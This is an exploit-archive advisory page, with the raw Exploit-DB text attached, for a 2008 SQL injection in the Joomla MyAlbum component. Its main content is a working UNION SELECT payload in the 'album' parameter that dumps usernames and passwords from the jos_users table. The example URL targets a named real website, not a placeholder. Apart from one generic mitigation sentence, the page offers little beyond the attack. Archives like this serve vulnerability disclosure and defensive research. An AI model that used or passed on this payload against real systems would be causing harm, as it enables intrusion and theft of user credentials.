Joomla Component MyAlbum SQL Injection Vulnerability

vendor:

MyAlbum

by:

parad0x

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MyAlbum

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:huseyin_bora_abaci:myalbum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component MyAlbum SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. An example of such a query is http://[target]/index.php?option=com_myalbum&album=[SQL], where [SQL] is the malicious SQL query. For example, http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------
# Title   :  Joomla Component MyAlbum SQL Injection Vulnerability
# Author  :  parad0x
# D.Page  :  http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.host.sk

side note:
  <name>myalbum</name>
  <creationDate>01.06.2007</creationDate>
  <author>HÃ¼seyin Bora ABACI</author>
  <copyright>GNU/GPL</copyright>
  <authorEmail>borkurt@hotmail.com</authorEmail>

  <authorUrl>www.joomla.org</authorUrl>
  <version>1.0</version>
  <description>MyAlbum is practical,comfortable,fast simple a picture gallery component.</description>

# milw0rm.com [2008-03-28]